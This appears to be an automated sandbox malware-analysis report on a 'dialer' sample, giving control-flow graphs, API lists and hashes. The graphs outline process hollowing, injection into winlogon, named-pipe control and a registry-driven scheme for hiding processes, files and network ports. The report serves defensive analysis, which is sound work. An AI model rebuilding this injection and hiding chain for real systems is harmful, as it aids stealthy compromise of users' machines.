                        control_flow_graph 227 140001c88-140001cb8 228 140001cbb-140001cc8 227->228 229 140001e8c-140001e91 228->229 230 140001cce-140001d25 CreateProcessW 228->230 229->228 233 140001e97 229->233 231 140001e88 230->231 232 140001d2b-140001d5a VirtualAllocEx 230->232 231->229 234 140001e5d-140001e60 232->234 235 140001d60-140001d7b WriteProcessMemory 232->235 236 140001e99-140001eb9 233->236 237 140001e62-140001e76 OpenProcess 234->237 238 140001e85 234->238 235->234 239 140001d81-140001d87 235->239 237->231 240 140001e78-140001e83 TerminateProcess 237->240 238->231 241 140001dd2-140001def VirtualAlloc 239->241 242 140001d89 239->242 240->231 241->234 243 140001df1-140001e07 GetThreadContext 241->243 244 140001d8c-140001dba WriteProcessMemory 242->244 243->234 246 140001e09-140001e2e WriteProcessMemory 243->246 244->234 245 140001dc0-140001dcc 244->245 245->244 247 140001dce 245->247 246->234 248 140001e30-140001e4c SetThreadContext 246->248 247->241 248->234 249 140001e4e-140001e5b ResumeThread 248->249 249->234 250 140001eba-140001ebf 249->250 250->236
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                        • String ID: @
                        • API String ID: 3462610200-2766056989
                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                        Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                        • String ID: dialersvc64
                        • API String ID: 4184240511-3881820561
                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                        Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                        • String ID: M$\\.\pipe\dialerchildproc64
                        • API String ID: 2203880229-3489460547
                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                        Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 276 140001000-14000103c RegOpenKeyExW 277 140001099-1400010be RegDeleteKeyExW 276->277 278 14000103e 276->278 279 14000104b-140001091 RegEnumKeyExW 278->279 280 140001093 RegCloseKey 279->280 281 140001040-140001045 RegDeleteKeyW 279->281 280->277 281->279
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Delete$CloseEnumOpen
                        • String ID: SOFTWARE\dialerconfig
                        • API String ID: 3013565938-461861421
                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                        Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 282 1400021d0-1400021da 283 1400021dd-1400021f0 call 140001b54 282->283 286 1400021f2-1400021fb Sleep 283->286 287 1400021fd-14000220a ConnectNamedPipe 283->287 286->283 288 140002241-140002246 Sleep 287->288 289 14000220c-14000222d ReadFile 287->289 290 14000224c-140002255 DisconnectNamedPipe 288->290 289->290 291 14000222f-140002234 289->291 290->287 291->290 292 140002236-14000223f 291->292 292->290
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 2071455217-3440882674
                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                        Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                        • String ID:
                        • API String ID: 3197395349-0
                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                        Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 303 140002b8e-140002ba1 K32EnumProcesses 302->303 304 140002ba3-140002bb2 303->304 305 140002beb-140002bf4 Sleep 303->305 306 140002bb4-140002bb8 304->306 307 140002bdc-140002be7 304->307 305->303 308 140002bba 306->308 309 140002bcb-140002bd2 306->309 307->305 310 140002bbe-140002bc3 308->310 312 140002bd6-140002bda 309->312 311 140002bc5-140002bc9 310->311 310->312 311->309 311->310 312->306 312->307
                        APIs
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                        • String ID:
                        • API String ID: 3676546796-0
                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                        Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 314 140002a90-140002ad8 CreateFileW 315 140002b25-140002b34 314->315 316 140002ada-140002afc WriteFile 314->316 317 140002b1c-140002b1f CloseHandle 316->317 318 140002afe-140002b00 316->318 317->315 318->317 319 140002b02-140002b16 WriteFile 318->319 319->317
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: File$Write$CloseCreateHandle
                        • String ID: \\.\pipe\dialercontrol_redirect64
                        • API String ID: 148219782-3440882674
                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                        Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: ntdll.dll
                        • API String ID: 1646373207-2227199552
                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                        Execution Graph

                        Execution Coverage:1.4%
                        Dynamic/Decrypted Code Coverage:95.2%
                        Signature Coverage:0%
                        Total number of Nodes:124
                        Total number of Limit Nodes:16
                        execution_graph 16898 2e99172273c 16899 2e99172276a 16898->16899 16900 2e9917227c5 VirtualAlloc 16899->16900 16903 2e9917228d4 16899->16903 16902 2e9917227ec 16900->16902 16900->16903 16901 2e991722858 LoadLibraryA 16901->16902 16902->16901 16902->16903 16904 2e99175554d 16905 2e991755554 16904->16905 16906 2e9917555bb 16905->16906 16907 2e991755637 VirtualProtect 16905->16907 16908 2e991755671 16907->16908 16909 2e991755663 GetLastError 16907->16909 16909->16908 16910 2e991755cf0 16911 2e991755cfd 16910->16911 16912 2e991755d09 16911->16912 16914 2e991755e1a 16911->16914 16913 2e991755d3e 16912->16913 16915 2e991755d8d 16912->16915 16916 2e991755d66 SetThreadContext 16913->16916 16917 2e991755efe 16914->16917 16918 2e991755e41 VirtualProtect FlushInstructionCache 16914->16918 16916->16915 16919 2e991755f1e 16917->16919 16930 2e9917543e0 16917->16930 16918->16914 16926 2e991754df0 GetCurrentProcess 16919->16926 16922 2e991755f23 16923 2e991755f37 ResumeThread 16922->16923 16925 2e991755f77 _log10_special 16922->16925 16924 2e991755f6b 16923->16924 16924->16922 16927 2e991754e0c 16926->16927 16928 2e991754e22 VirtualProtect FlushInstructionCache 16927->16928 16929 2e991754e53 16927->16929 16928->16927 16929->16922 16933 2e9917543fc 16930->16933 16931 2e99175445f 16931->16919 16932 2e991754412 VirtualFree 16932->16933 16933->16931 16933->16932 16934 2e991753ab9 16937 2e991753a06 16934->16937 16935 2e991753a70 16936 2e991753a56 VirtualQuery 16936->16935 16936->16937 16937->16935 16937->16936 16938 2e991753a8a VirtualAlloc 16937->16938 16938->16935 16939 2e991753abb GetLastError 16938->16939 16939->16935 16939->16937 16940 2e991751abc 16946 2e991751628 GetProcessHeap 16940->16946 16942 2e991751ad2 Sleep SleepEx 16944 2e991751acb 16942->16944 16944->16942 16945 2e991751598 StrCmpIW StrCmpW 16944->16945 16991 2e9917518b4 16944->16991 16945->16944 16947 2e991751648 __std_exception_copy 16946->16947 17008 2e991751268 GetProcessHeap 16947->17008 16949 2e991751650 16950 2e991751268 2 API calls 16949->16950 16951 2e991751661 16950->16951 16952 2e991751268 2 API calls 16951->16952 16953 2e99175166a 16952->16953 16954 2e991751268 2 API calls 16953->16954 16955 2e991751673 16954->16955 16956 2e99175168e RegOpenKeyExW 16955->16956 16957 2e9917516c0 RegOpenKeyExW 16956->16957 16958 2e9917518a6 16956->16958 16959 2e9917516ff RegOpenKeyExW 16957->16959 16960 2e9917516e9 16957->16960 16958->16944 16962 2e99175173a RegOpenKeyExW 16959->16962 16963 2e991751723 16959->16963 17019 2e9917512bc RegQueryInfoKeyW 16960->17019 16966 2e99175175e 16962->16966 16967 2e991751775 RegOpenKeyExW 16962->16967 17012 2e99175104c RegQueryInfoKeyW 16963->17012 16964 2e9917516f5 RegCloseKey 16964->16959 16968 2e9917512bc 11 API calls 16966->16968 16969 2e9917517b0 RegOpenKeyExW 16967->16969 16970 2e991751799 16967->16970 16972 2e99175176b RegCloseKey 16968->16972 16974 2e9917517eb RegOpenKeyExW 16969->16974 16975 2e9917517d4 16969->16975 16973 2e9917512bc 11 API calls 16970->16973 16972->16967 16976 2e9917517a6 RegCloseKey 16973->16976 16978 2e99175180f 16974->16978 16979 2e991751826 RegOpenKeyExW 16974->16979 16977 2e9917512bc 11 API calls 16975->16977 16976->16969 16980 2e9917517e1 RegCloseKey 16977->16980 16981 2e99175104c 4 API calls 16978->16981 16982 2e99175184a 16979->16982 16983 2e991751861 RegOpenKeyExW 16979->16983 16980->16974 16987 2e99175181c RegCloseKey 16981->16987 16984 2e99175104c 4 API calls 16982->16984 16985 2e99175189c RegCloseKey 16983->16985 16986 2e991751885 16983->16986 16988 2e991751857 RegCloseKey 16984->16988 16985->16958 16989 2e99175104c 4 API calls 16986->16989 16987->16979 16988->16983 16990 2e991751892 RegCloseKey 16989->16990 16990->16985 17037 2e9917514a4 16991->17037 17030 2e991766168 17008->17030 17011 2e9917512ae __std_exception_copy 17011->16949 17013 2e9917510bf 17012->17013 17014 2e9917511b5 RegCloseKey 17012->17014 17013->17014 17015 2e9917510cf RegEnumValueW 17013->17015 17014->16962 17016 2e991751125 __std_exception_copy __free_lconv_mon 17015->17016 17016->17014 17016->17015 17017 2e99175114e GetProcessHeap 17016->17017 17018 2e99175116e GetProcessHeap 17016->17018 17017->17016 17018->17016 17020 2e99175148a __free_lconv_mon 17019->17020 17021 2e991751327 GetProcessHeap 17019->17021 17020->16964 17024 2e99175133e __std_exception_copy __free_lconv_mon 17021->17024 17022 2e991751476 GetProcessHeap 17022->17020 17023 2e991751352 RegEnumValueW 17023->17024 17024->17022 17024->17023 17026 2e99175141e lstrlenW GetProcessHeap 17024->17026 17027 2e9917513d3 GetProcessHeap 17024->17027 17028 2e991751443 StrCpyW 17024->17028 17029 2e9917513f3 GetProcessHeap 17024->17029 17032 2e99175152c 17024->17032 17026->17024 17027->17024 17028->17024 17029->17024 17031 2e991751283 GetProcessHeap 17030->17031 17031->17011 17033 2e99175157c 17032->17033 17034 2e991751546 17032->17034 17033->17024 17034->17033 17035 2e99175155d StrCmpIW 17034->17035 17036 2e991751565 StrCmpW 17034->17036 17035->17034 17036->17034 17038 2e9917514e1 GetProcessHeap 17037->17038 17039 2e9917514c1 GetProcessHeap 17037->17039 17043 2e991766180 17038->17043 17041 2e9917514da __free_lconv_mon 17039->17041 17041->17038 17041->17039 17044 2e9917514f6 GetProcessHeap HeapFree 17043->17044 17045 2e9917528c8 17047 2e99175290e 17045->17047 17046 2e991752970 17047->17046 17049 2e991753844 17047->17049 17050 2e991753851 StrCmpNIW 17049->17050 17051 2e991753866 17049->17051 17050->17051 17051->17047

                        Executed Functions

                        Function 000002E991751628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: 54b8228711d56d83d96e028295ec185cd7547312acf9b7e7a1458d33eaddbd6f
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: A0713036354B9285EB10AF67E858A5D3374F784BC9F82112AED4E87B6ADF34C484CB50
                        Function 000002E991753790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: 889b996a8caf1a720874174e44a79219beab5574743a7c3e537098b2f91f301b
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: 85115E2674478682EF189B12E40866962B0F748BC5F86042EEE8947766EF3DC585CB24
                        Function 000002E991755B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 59 2e991755b30-2e991755b57 60 2e991755b59-2e991755b68 59->60 61 2e991755b6b-2e991755b76 GetCurrentThreadId 59->61 60->61 62 2e991755b78-2e991755b7d 61->62 63 2e991755b82-2e991755b89 61->63 64 2e991755faf-2e991755fc6 call 2e991757940 62->64 65 2e991755b9b-2e991755baf 63->65 66 2e991755b8b-2e991755b96 call 2e991755960 63->66 69 2e991755bbe-2e991755bc4 65->69 66->64 70 2e991755bca-2e991755bd3 69->70 71 2e991755c95-2e991755cb6 69->71 74 2e991755c1a-2e991755c8d call 2e991754510 call 2e9917544b0 call 2e991754470 70->74 75 2e991755bd5-2e991755c18 call 2e9917585c0 70->75 79 2e991755e1f-2e991755e30 call 2e9917574bf 71->79 80 2e991755cbc-2e991755cdc GetThreadContext 71->80 88 2e991755c90 74->88 75->88 91 2e991755e35-2e991755e3b 79->91 81 2e991755e1a 80->81 82 2e991755ce2-2e991755d03 80->82 81->79 82->81 90 2e991755d09-2e991755d12 82->90 88->69 94 2e991755d92-2e991755da3 90->94 95 2e991755d14-2e991755d25 90->95 96 2e991755efe-2e991755f0e 91->96 97 2e991755e41-2e991755e98 VirtualProtect FlushInstructionCache 91->97 103 2e991755e15 94->103 104 2e991755da5-2e991755dc3 94->104 99 2e991755d8d 95->99 100 2e991755d27-2e991755d3c 95->100 106 2e991755f1e-2e991755f2a call 2e991754df0 96->106 107 2e991755f10-2e991755f17 96->107 101 2e991755e9a-2e991755ea4 97->101 102 2e991755ec9-2e991755ef9 call 2e9917578ac 97->102 99->103 100->99 110 2e991755d3e-2e991755d88 call 2e991753970 SetThreadContext 100->110 101->102 111 2e991755ea6-2e991755ec1 call 2e991754390 101->111 102->91 104->103 112 2e991755dc5-2e991755e10 call 2e991753900 call 2e9917574dd 104->112 120 2e991755f2f-2e991755f35 106->120 107->106 108 2e991755f19 call 2e9917543e0 107->108 108->106 110->99 111->102 112->103 124 2e991755f77-2e991755f95 120->124 125 2e991755f37-2e991755f75 ResumeThread call 2e9917578ac 120->125 128 2e991755fa9 124->128 129 2e991755f97-2e991755fa6 124->129 125->120 128->64 129->128
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction ID: 1cfaaca5a2e5f2dbf610dce76985e3aebf4ce61cea1ed6e8382bb37d242726a6
                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction Fuzzy Hash: 25D19C76244B8982DA70DB06E49835A77B0F388B84F52411BEACD47BA6DF3CC591CF50
                        Function 000002E9917550D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 131 2e9917550d0-2e9917550fc 132 2e9917550fe-2e991755106 131->132 133 2e99175510d-2e991755116 131->133 132->133 134 2e991755118-2e991755120 133->134 135 2e991755127-2e991755130 133->135 134->135 136 2e991755132-2e99175513a 135->136 137 2e991755141-2e99175514a 135->137 136->137 138 2e99175514c-2e991755151 137->138 139 2e991755156-2e991755161 GetCurrentThreadId 137->139 140 2e9917556d3-2e9917556da 138->140 141 2e99175516d-2e991755174 139->141 142 2e991755163-2e991755168 139->142 143 2e991755176-2e99175517c 141->143 144 2e991755181-2e99175518a 141->144 142->140 143->140 145 2e99175518c-2e991755191 144->145 146 2e991755196-2e9917551a2 144->146 145->140 147 2e9917551ce-2e991755225 call 2e9917556e0 * 2 146->147 148 2e9917551a4-2e9917551c9 146->148 153 2e99175523a-2e991755243 147->153 154 2e991755227-2e99175522e 147->154 148->140 157 2e991755255-2e99175525e 153->157 158 2e991755245-2e991755252 153->158 155 2e991755230 154->155 156 2e991755236 154->156 159 2e9917552b0-2e9917552b6 155->159 160 2e9917552a6-2e9917552aa 156->160 161 2e991755260-2e991755270 157->161 162 2e991755273-2e991755298 call 2e991757870 157->162 158->157 163 2e9917552e5-2e9917552eb 159->163 164 2e9917552b8-2e9917552d4 call 2e991754390 159->164 160->159 161->162 172 2e99175529e 162->172 173 2e99175532d-2e991755342 call 2e991753cc0 162->173 167 2e9917552ed-2e99175530c call 2e9917578ac 163->167 168 2e991755315-2e991755328 163->168 164->163 174 2e9917552d6-2e9917552de 164->174 167->168 168->140 172->160 178 2e991755351-2e99175535a 173->178 179 2e991755344-2e99175534c 173->179 174->163 180 2e99175536c-2e9917553ba call 2e991758c60 178->180 181 2e99175535c-2e991755369 178->181 179->160 184 2e9917553c2-2e9917553ca 180->184 181->180 185 2e9917553d0-2e9917554bb call 2e991757440 184->185 186 2e9917554d7-2e9917554df 184->186 198 2e9917554bd 185->198 199 2e9917554bf-2e9917554ce call 2e991754060 185->199 188 2e9917554e1-2e9917554f4 call 2e991754590 186->188 189 2e991755523-2e99175552b 186->189 200 2e9917554f6 188->200 201 2e9917554f8-2e991755521 188->201 190 2e99175552d-2e991755535 189->190 191 2e991755537-2e991755546 189->191 190->191 195 2e991755554-2e991755561 190->195 196 2e99175554f 191->196 197 2e991755548 191->197 203 2e991755564-2e9917555b9 call 2e9917585c0 195->203 204 2e991755563 195->204 196->195 197->196 198->186 207 2e9917554d0 199->207 208 2e9917554d2 199->208 200->189 201->186 210 2e9917555bb-2e9917555c3 203->210 211 2e9917555c8-2e991755661 call 2e991754510 call 2e991754470 VirtualProtect 203->211 204->203 207->186 208->184 216 2e991755671-2e9917556d1 211->216 217 2e991755663-2e991755668 GetLastError 211->217 216->140 217->216
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction ID: eebe92032a7fdedf781faa804f7575b613c740f96bbb6c7e2e6b86a645c85fbc
                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction Fuzzy Hash: E802BA32259BC586E7A0CB56F49435ABBA1F3C4794F11401AEA8E87BA9DF7CC494CF10
